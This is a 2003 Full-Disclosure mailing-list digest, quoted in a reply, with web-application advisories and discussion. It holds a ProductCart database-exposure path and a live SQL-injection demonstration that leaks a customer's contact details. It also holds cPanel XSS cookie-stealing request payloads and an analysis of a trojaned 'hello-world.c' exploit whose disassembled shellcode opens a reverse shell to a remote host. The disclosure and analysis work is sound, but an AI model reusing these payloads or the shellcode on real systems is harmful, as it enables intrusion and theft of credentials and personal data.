On Sun, 2003-07-06 at 16:00, [EMAIL PROTECTED] wrote:
> Send Full-Disclosure mailing list submissions to
> 	[EMAIL PROTECTED]
>
> To subscribe or unsubscribe via the World Wide Web, visit
> 	http://lists.netsys.com/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> 	[EMAIL PROTECTED]
>
> You can reach the person managing the list at
> 	[EMAIL PROTECTED]
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Today's Topics:
>
>    1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri Huynh)
>    2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (gyrniff)
>    3. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (KF)
>    4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (morning_wood)
>    5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
>    6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
>    7. Re: tripbid secure codes (Dave Korn)
>    8. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (Larry W. Cashdollar)
>    9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen)
>
> --__--__--
>
> Message: 1
> From: "Tri Huynh" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Date: Sat, 5 Jul 2003 13:07:51 -0700
> Subject: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
>
> ProductCart database file can be downloaded remotely
> =================================================
>
> PROGRAM: ProductCart
> HOMEPAGE: http://www.earlyimpact.com/productcart/
> VULNERABLE VERSIONS: 1.0 to 2.0
> RISK: High
>
>
> DESCRIPTION
> =================================================
>
> ProductCart® is an ASP shopping cart that combines sophisticated
> ecommerce features with time-saving store management tools and remarkable
> ease of use. It is widely used by many e-commerce sites.
>
> DETAILS
> =================================================
>
> In the default installation, product cart database file is located at
> /productcart/database/EIPC.mdb which can be accessed easily
> by any remote attackers.
>
> Sample: http://victimhost/productcart/database/EIPC.mdb
>
> The database file includes the store administration password as well as
> customer's info (including credit card info).
>
>
> WORKAROUND
> =================================================
>
> Rename the database file, put it in a protected directory.
>
>
> CREDITS
> =================================================
>
> Discovered by Tri Huynh from Sentry Union
>
>
> DISCLAIMER
> =================================================
>
> The information within this paper may change without notice. Use of
> this information constitutes acceptance for use in an AS IS condition.
> There are NO warranties with regard to this information. In no event
> shall the author be liable for any damages whatsoever arising out of
> or in connection with the use or spread of this information. Any use
> of this information is at the user's own risk.
>
>
> FEEDBACK
> =================================================
>
> Please send suggestions, updates, and comments to: [EMAIL PROTECTED]
>
> --__--__--
>
> Message: 2
> From: gyrniff <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> Date: Sat, 5 Jul 2003 19:37:41 +0200
>
> URL:
> http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> Change the name Paul to Paul'
>
> Microsoft OLE DB Provider for ODBC Drivers
> error '80040e14'
> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
>
> have a nice weekend ;-)
>
> On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > ProductCart database file can be downloaded remotely
> > =================================================
> >
> > PROGRAM: ProductCart
> > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > VULNERABLE VERSIONS: 1.0 to 2.0
> > RISK: High
> >
> >
> > DESCRIPTION
> > =================================================
> >
> > ProductCart® is an ASP shopping cart that combines sophisticated
> > ecommerce features with time-saving store management tools and remarkable
> > ease of use. It is widely used by many e-commerce sites.
> >
> > DETAILS
> > =================================================
> >
> > In the default installation, product cart database file is located at
> > /productcart/database/EIPC.mdb which can be accessed easily
> > by any remote attackers.
> >
> > Sample: http://victimhost/productcart/database/EIPC.mdb
> >
> > The database file includes the store administration password as well as
> > customer's info (including credit card info).
> >
> >
> > WORKAROUND
> > =================================================
> >
> > Rename the database file, put it in a protected directory.
> >
> >
> > CREDITS
> > =================================================
> >
> > Discovered by Tri Huynh from Sentry Union
> >
> >
> > DISCLAIMER
> > =================================================
> >
> > The information within this paper may change without notice. Use of
> > this information constitutes acceptance for use in an AS IS condition.
> > There are NO warranties with regard to this information. In no event
> > shall the author be liable for any damages whatsoever arising out of
> > or in connection with the use or spread of this information. Any use
> > of this information is at the user's own risk.
> >
> >
> > FEEDBACK
> > =================================================
> >
> > Please send suggestions, updates, and comments to: [EMAIL PROTECTED]
>
> --__--__--
>
> Message: 3
> Date: Sat, 05 Jul 2003 15:30:28 -0400
> From: KF <[EMAIL PROTECTED]>
> To: gyrniff <[EMAIL PROTECTED]>
> CC: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
>
> Was that legit California data? I am sure that making someone have a
> nice weekend you just made multiple someones have a shitty month ahead
> of them...
> http://www.theregister.co.uk/content/55/31509.html
>
> -KF
>
> gyrniff wrote:
>
> >URL:
> >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> >Change the name Paul to Paul'
> >
> >Microsoft OLE DB Provider for ODBC Drivers
> > error '80040e14'
> >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> >
> >have a nice weekend ;-)
> >
> >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> >
> >
> >>ProductCart database file can be downloaded remotely
> >>=================================================
> >>
> >>PROGRAM: ProductCart
> >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> >>VULNERABLE VERSIONS: 1.0 to 2.0
> >>RISK: High
> >>
> >>
> >>DESCRIPTION
> >>=================================================
> >>
> >>ProductCart® is an ASP shopping cart that combines sophisticated
> >>ecommerce features with time-saving store management tools and remarkable
> >>ease of use. It is widely used by many e-commerce sites.
> >>
> >>DETAILS
> >>=================================================
> >>
> >>In the default installation, product cart database file is located at
> >>/productcart/database/EIPC.mdb which can be accessed easily
> >>by any remote attackers.
> >>
> >>Sample: http://victimhost/productcart/database/EIPC.mdb
> >>
> >>The database file includes the store administration password as well as
> >>customer's info (including credit card info).
> >>
> >>
> >>WORKAROUND
> >>=================================================
> >>
> >>Rename the database file, put it in a protected directory.
> >>
> >>
> >>CREDITS
> >>=================================================
> >>
> >>Discovered by Tri Huynh from Sentry Union
> >>
> >>
> >>DISCLAIMER
> >>=================================================
> >>
> >>The information within this paper may change without notice. Use of
> >>this information constitutes acceptance for use in an AS IS condition.
> >>There are NO warranties with regard to this information. In no event
> >>shall the author be liable for any damages whatsoever arising out of
> >>or in connection with the use or spread of this information. Any use
> >>of this information is at the user's own risk.
> >>
> >>
> >>FEEDBACK
> >>=================================================
> >>
> >>Please send suggestions, updates, and comments to: [EMAIL PROTECTED]
> >>
> >>
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
> --__--__--
>
> Message: 4
> From: "morning_wood" <[EMAIL PROTECTED]>
> To: "gyrniff" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
> Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> Date: Sat, 5 Jul 2003 15:24:46 -0700
>
> vuln to XSS too..
>
> http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp
>
> ----- Original Message -----
> From: "gyrniff" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Saturday, July 05, 2003 10:37 AM
> Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
>
>
> > URL:
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > Change the name Paul to Paul'
> >
> > Microsoft OLE DB Provider for ODBC Drivers
> > error '80040e14'
> > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> >
> > have a nice weekend ;-)
> >
> > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > ProductCart database file can be downloaded remotely
> > > =================================================
> > >
> > > PROGRAM: ProductCart
> > > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > VULNERABLE VERSIONS: 1.0 to 2.0
> > > RISK: High
> > >
> > >
> > > DESCRIPTION
> > > =================================================
> > >
> > > ProductCart® is an ASP shopping cart that combines sophisticated
> > > ecommerce features with time-saving store management tools and remarkable
> > > ease of use. It is widely used by many e-commerce sites.
> > >
> > > DETAILS
> > > =================================================
> > >
> > > In the default installation, product cart database file is located at
> > > /productcart/database/EIPC.mdb which can be accessed easily
> > > by any remote attackers.
> > >
> > > Sample: http://victimhost/productcart/database/EIPC.mdb
> > >
> > > The database file includes the store administration password as well as
> > > customer's info (including credit card info).
> > >
> > >
> > > WORKAROUND
> > > =================================================
> > >
> > > Rename the database file, put it in a protected directory.
> > >
> > >
> > > CREDITS
> > > =================================================
> > >
> > > Discovered by Tri Huynh from Sentry Union
> > >
> > >
> > > DISCLAIMER
> > > =================================================
> > >
> > > The information within this paper may change without notice. Use of
> > > this information constitutes acceptance for use in an AS IS condition.
> > > There are NO warranties with regard to this information. In no event
> > > shall the author be liable for any damages whatsoever arising out of
> > > or in connection with the use or spread of this information. Any use
> > > of this information is at the user's own risk.
> > >
> > >
> > > FEEDBACK
> > > =================================================
> > >
> > > Please send suggestions, updates, and comments to: [EMAIL PROTECTED]
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> --__--__--
>
> Message: 5
> From: Ory Segal <[EMAIL PROTECTED]>
> To: "BugTraq (E-mail)" <[EMAIL PROTECTED]>,
>     "Full Disclosure (E-mail)" <[EMAIL PROTECTED]>,
>     "WebAppSec (E-mail)" <[EMAIL PROTECTED]>
> Date: Sun, 6 Jul 2003 01:39:33 -0700
> Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
>
> ////////////////////////////////////////////////////////////////////////////////
> //==========================>> Security Advisory <<==========================//
> ////////////////////////////////////////////////////////////////////////////////
>
> -------------------------------------------------------------------------------
> -----[ cPanel Malicious HTML Tags Injection Vulnerability
> -------------------------------------------------------------------------------
>
> --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> --[ Discovery Date: 06/17/2003 (Vendor was notified)
> --[ Release Date: 07/06/2003
> --[ Product: Tested on cPanel 6.4.2-STABLE
> --[ Severity: Medium
> --[ CVE: Not assigned yet
>
> --[ Summary
>
> From the vendor's web site:
> "...The Cpanel interface is a client side interface, which allows your customers
> to easily control a web hosting account. With the touch of a button, they can
> add e-mail accounts, access their files, backup their files, setup a shopping
> cart, and more..."
>
> Web users can embed Malicious HTML tags in HTTP requests, which will later
> be parsed by the web site administrator's browser, in several cPanel screens.
> This may lead to theft of cookies associated with the domain, or execution of
> client-side scripts in the administrator's browser.
>
> --[ Description
>
> The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web site
> administrator with HTTP request logs. These scripts do not sanitize the URL part
> of HTTP requests and present them to the administrator as is, thus, allowing an
> attacker to embed malicious HTML tags that will later be parsed and executed by
> the administrator's browser.
>
> For example, let's take a look at the 'Error Log' screen:
>
> [From errlog.html]
> ...
> <b>Last 300 Error Log Messages in reverse order:</b><hr>
> <pre>
> [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> /home/dir/public_html/foobar.html
> </pre>
> ...
>
> The following request will present a pop-up screen with the cookies
> that are currently associated with the domain:
>
> GET /<script>alert(document.cookie);</script> HTTP/1.0
> Host: www.site.com
>
>
> --[ Note
>
> The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented the
> latest requests as HTML links, thus the malicious payload must terminate the <a>
> tag before opening a new one. For example:
>
> GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> Host: www.site.com
>
> --[ Solution
>
> According to the vendor, the problem was fixed in version 7.0, which can be
> downloaded at: http://www.cpanel.net/downloads.htm
>
>
>
>
> Ory Segal
> Senior Security Engineer
> Sanctum, Inc.
> http://www.SanctumInc.Com/
>
> Ampa Bldg., 1 Sapir Street.
> Mail: P.O.Box 12047
> Herzliya 46733, ISRAEL
>
> Tel: +972-9-9586077 Ext. 236
> Fax: +972-9-9576337
>
> --__--__--
>
> Message: 6
> Date: Sun, 06 Jul 2003 11:46:44 +0300
> From: Ory Segal <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
> Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
>
> -------------------------------------------------------------------------------
> -----[ cPanel Malicious HTML Tags Injection Vulnerability
> -------------------------------------------------------------------------------
>
> --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> --[ Discovery Date: 06/17/2003 (Vendor was notified)
> --[ Release Date: 07/06/2003
> --[ Product: Tested on cPanel 6.4.2-STABLE
> --[ Severity: Medium
> --[ CVE: Not assigned yet
>
> --[ Summary
>
> From the vendor's web site:
> "...The Cpanel interface is a client side interface, which allows your customers
> to easily control a web hosting account. With the touch of a button, they can
> add e-mail accounts, access their files, backup their files, setup a shopping
> cart, and more..."
>
> Web users can embed Malicious HTML tags in HTTP requests, which will later
> be parsed by the web site administrator's browser, in several cPanel screens.
> This may lead to theft of cookies associated with the domain, or execution of
> client-side scripts in the administrator's browser.
>
> --[ Description
>
> The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web site
> administrator with HTTP request logs. These scripts do not sanitize the URL part
> of HTTP requests and present them to the administrator as is, thus, allowing an
> attacker to embed malicious HTML tags that will later be parsed and executed by
> the administrator's browser.
>
> For example, let's take a look at the 'Error Log' screen:
>
> [From errlog.html]
> ...
> <b>Last 300 Error Log Messages in reverse order:</b><hr>
> <pre>
> [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> /home/dir/public_html/foobar.html
> </pre>
> ...
>
> The following request will present a pop-up screen with the cookies
> that are currently associated with the domain:
>
> GET /<script>alert(document.cookie);</script> HTTP/1.0
> Host: www.site.com
>
>
> --[ Note
>
> The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented the
> latest requests as HTML links, thus the malicious payload must terminate the <a>
> tag before opening a new one.
> For example:
>
> GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> Host: www.site.com
>
> --[ Solution
>
> According to the vendor, the problem was fixed in version 7.0, which can be
> downloaded at: http://www.cpanel.net/downloads.htm
>
>
> --__--__--
>
> Message: 7
> From: "Dave Korn" <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] tripbid secure codes
> Date: Sun, 06 Jul 2003 12:23:01 +0000
>
>
> ----- Original Message -----
> From: <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, June 27, 2003 6:25 AM
> Subject: [Full-Disclosure] tripbid secure codes
>
>
> >i post the thing to the vuln dev some days ago and get quite a big response.
> >not only do i get a heart 2 heat with n1xo reiman about portmon ! but
> >some folks want me to look at the code they make, specially a 'hello-
> >world.c' progie -> " holo, can you check my hello-world.c for strcpy
> >?? securecode do the trick " <- paraphrase the msg, i rm -rf / it since
> >it make me anger and stress it !
> >
> >i am willing to try the secure code since the grep 'strcpy' is losing
> >his thrills so i trick around with :
> >[EMAIL PROTECTED] ./securecode -s hello-world.c
>
>
> Never ever EVER run an insecure program over arbitrary data you receive from
> the net without checking it for safety first..... Let's look at this
> hello-world.c before we run anything on it....
>
>
> Z:\sploits-misc\targzip>type hello-world.c
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!?
> [the rest of the file is non-printable binary: the repeated return address, the NOP sled and the shellcode, itemised below]
>
>
> Heh. Boy, did j00 get hax0red! Here's what's actually in that file:
>
> $0000 - $00ff: 'A' x 256
> $0100 - $011f: DWORD $bffff321 x 8
> $0120 - $0378: $90 = NOP x 600
> $0378 - $03fa: Binary shellcode
> $03fb - $03fc: CR, LF
> <EOF>
>
> In other words, it's one very long line. Looks to me like the securecode
> program reads each line of the .c file into a buffer that's only 256 bytes
> long; this exploit fills it with 'A', then overwrites the return address on
> the stack with a pointer into the NOP slide. Here's a disassembly of the
> shellcode: note that offset 0 in this disassembly is offset $0370 in the
> file. Sorry for not commenting this, but I don't speak linux asm; however I
> can see a whole bunch of syscalls going on in there; the values in eax
> should tell you whether anything nastier than a few mkdirs was done to
> you...
> > Z:\sploits-misc\targzip>objdump -D --target=binary > hello-world2.bin --architectu > re=i386 > > hello-world2.bin: file format binary > > objdump: hello-world2.bin: no symbols > Disassembly of section .data: > > 00000000 <.data>: > 0: 90 nop > 1: 90 nop > 2: 90 nop > 3: 90 nop > 4: 90 nop > 5: 90 nop > 6: 90 nop > 7: 90 nop > 8: 90 nop > 9: 31 c0 xor %eax,%eax > b: 31 db xor %ebx,%ebx > d: 31 c9 xor %ecx,%ecx > f: 51 push %ecx > 10: b1 06 mov $0x6,%cl > 12: 51 push %ecx > 13: b1 01 mov $0x1,%cl > 15: 51 push %ecx > 16: b1 02 mov $0x2,%cl > 18: 51 push %ecx > 19: 89 e1 mov %esp,%ecx > 1b: b3 01 mov $0x1,%bl > 1d: b0 66 mov $0x66,%al > 1f: cd 80 int $0x80 > 21: 89 c2 mov %eax,%edx > 23: 31 c0 xor %eax,%eax > 25: 31 c9 xor %ecx,%ecx > 27: 51 push %ecx > 28: 51 push %ecx > 29: 68 d4 62 f7 cc push $0xccf762d4 > 2e: 66 68 b0 ef pushw $0xefb0 > 32: b1 02 mov $0x2,%cl > 34: 66 51 push %cx > 36: 89 e7 mov %esp,%edi > 38: b3 10 mov $0x10,%bl > 3a: 53 push %ebx > 3b: 57 push %edi > 3c: 52 push %edx > 3d: 89 e1 mov %esp,%ecx > 3f: b3 03 mov $0x3,%bl > 41: b0 66 mov $0x66,%al > 43: cd 80 int $0x80 > 45: 31 c9 xor %ecx,%ecx > 47: 39 c1 cmp %eax,%ecx > 49: 74 06 je 0x51 > 4b: 31 c0 xor %eax,%eax > 4d: b0 01 mov $0x1,%al > 4f: cd 80 int $0x80 > 51: 31 c0 xor %eax,%eax > 53: b0 3f mov $0x3f,%al > 55: 89 d3 mov %edx,%ebx > 57: cd 80 int $0x80 > 59: 31 c0 xor %eax,%eax > 5b: b0 3f mov $0x3f,%al > 5d: 89 d3 mov %edx,%ebx > 5f: b1 01 mov $0x1,%cl > 61: cd 80 int $0x80 > 63: 31 c0 xor %eax,%eax > 65: b0 3f mov $0x3f,%al > 67: 89 d3 mov %edx,%ebx > 69: b1 02 mov $0x2,%cl > 6b: cd 80 int $0x80 > 6d: 31 c0 xor %eax,%eax > 6f: 31 d2 xor %edx,%edx > 71: 50 push %eax > 72: 68 6e 2f 73 68 push $0x68732f6e > 77: 68 2f 2f 62 69 push $0x69622f2f > 7c: 89 e3 mov %esp,%ebx > 7e: 50 push %eax > 7f: 53 push %ebx > 80: 89 e1 mov %esp,%ecx > 82: b0 0b mov $0xb,%al > 84: cd 80 int $0x80 > 86: 31 c0 xor %eax,%eax > 88: b0 01 mov $0x1,%al > 8a: cd 80 int $0x80 > 8c: 0d .byte 0xd > 8d: 0a .byte 0xa > > 
>
> DaveK
>
> --__--__--
>
> Message: 8
> Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT)
> From: "Larry W. Cashdollar" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
> can be downloaded remotely
>
> 949 is a legit zip code in cali.
>
> On Sat, 5 Jul 2003, KF wrote:
>
> > Was that legit California data? I am sure that making someone have a
> > nice weekend you just made multiple someones have a shitty month ahead
> > of them...
> > http://www.theregister.co.uk/content/55/31509.html
> >
> > -KF
> >
> > gyrniff wrote:
> >
> > >URL:
> > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > >Change the name Paul to Paul'
> > >
> > >Microsoft OLE DB Provider for ODBC Drivers
> > > error '80040e14'
> > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > >
> > >have a nice weekend ;-)
> > >
> > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > >
> > >>ProductCart database file can be downloaded remotely
> > >>=================================================
> > >>
> > >>PROGRAM: ProductCart
> > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> > >>VULNERABLE VERSIONS: 1.0 to 2.0
> > >>RISK: High
> > >>
> > >>
> > >>DESCRIPTION
> > >>=================================================
> > >>
> > >>ProductCart® is an ASP shopping cart that combines sophisticated
> > >>ecommerce features with time-saving store management tools and remarkable
> > >>ease of use. It is widely used by many e-commerce sites.
> > >>
> > >>DETAILS
> > >>=================================================
> > >>
> > >>In the default installation, product cart database file is located at
> > >>/productcart/database/EIPC.mdb which can be accessed easily
> > >>by any remote attackers.
> > >>
> > >>Sample: http://victimhost/productcart/database/EIPC.mdb
> > >>
> > >>The database file includes the store administration password as well as
> > >>customer's info (including credit card info).
> > >>
> > >>
> > >>WORKAROUND
> > >>=================================================
> > >>
> > >>Rename the database file, put it in a protected directory.
> > >>
> > >>
> > >>CREDITS
> > >>=================================================
> > >>
> > >>Discovered by Tri Huynh from Sentry Union
> > >>
> > >>
> > >>DISCLAIMER
> > >>=================================================
> > >>
> > >>The information within this paper may change without notice. Use of
> > >>this information constitutes acceptance for use in an AS IS condition.
> > >>There are NO warranties with regard to this information. In no event
> > >>shall the author be liable for any damages whatsoever arising out of
> > >>or in connection with the use or spread of this information.
> > >>Any use
> > >>of this information is at the user's own risk.
> > >>
> > >>
> > >>FEEDBACK
> > >>=================================================
> > >>
> > >>Please send suggestions, updates, and comments to: [EMAIL PROTECTED]
> > >>
> > >>
> > >
> > >_______________________________________________
> > >Full-Disclosure - We believe in it.
> > >Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
> --__--__--
>
> Message: 9
> From: "Kristian Hermansen" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> Date: Tue, 1 Jul 2003 22:49:59 -0400
>
> Yes, programmers should be trained to write better code...but it is more
> profitable to allow sloppy code and a simple fix later (behind the scenes
> with vendor notification). This is MS point-of-view. This is why they want
> vendor notification, rather than public notification. Again, I say let the
> 0-days fly.
>
> Did you know that certain US government agencies have teams whose only
> job is to break software? This has been going on since the 1970's. It
> helps to produce secure code in mission critical applications that the
> military needs. I am not saying that MS needs to be SO drastic...but a
> small team for their MOST popular products would sure be wise to start with.
> Why not hire fucking intern teenagers from russia to "Crash Test" their
> development projects (facetious)? Would it be so difficult/expensive to
> hire some of the main companies that are breaking your software???
>
> Kris Hermansen
>
> ----- Original Message -----
> From: "Schmehl, Paul L" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, July 01, 2003 6:58 PM
> Subject: RE: [Full-Disclosure] Microsoft Cries Wolf ( again )
>
>
> > > -----Original Message-----
> > > From: Kristian Hermansen [mailto:[EMAIL PROTECTED]
> > > Sent: Tuesday, July 01, 2003 3:09 PM
> > > To: [EMAIL PROTECTED]
> > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> > >
> > >
> > > I agree. It is not our problem. The reason is this.
> > > Microsoft would like to reduce costs. Fixing bugs in
> > > products costs money, and 0-day bugs need immediate fixes
> > > which slow down MS total output ability. They would like to
> > > see everyone reporting to the vendor first because this saves
> > > them money!!! In this respect, this also allows them to go on
> > > writing sloppy code in order to save a few bucks on every
> > > product, thus reducing their overhead. I don't want sloppy
> > > code. Let the 0-days fly....maybe MS will start doing
> > > extensive testing to their products before they release it
> > > for sale to millions of customers. I thought .NET was
> > > supposed to fix all this ;-P
> >
> > That's too funny. Microsoft ran a "buffer overflow finder" against the
> > codebase for XP, and the VP in charge announced publicly that they had
> > "eliminated buffer overflows in XP". Within thirty days, eEye announced
> > the UPnP vulnerability in SSDP, which is the single most devastating
> > hole ever found in MS products. (You can compromise an entire network
> > of XP machines with one attack, simultaneously.)
> >
> > You don't fix code by extensive testing. You fix it by teaching how to
> > write secure code to begin with *and* by ongoing, consistent audits done
> > before code is released. (OpenBSD has been doing this for years, and
> > look at the results.)
> >
> > Paul Schmehl ([EMAIL PROTECTED])
> > Adjunct Information Security Officer
> > The University of Texas at Dallas
> > AVIEN Founding Member
> > http://www.utdallas.edu/~pauls/
>
> --__--__--
>
> _______________________________________________
> Full-Disclosure mailing list
> [EMAIL PROTECTED]
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>
>
> End of Full-Disclosure Digest

-- 
Markus Nielsen <[EMAIL PROTECTED]>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
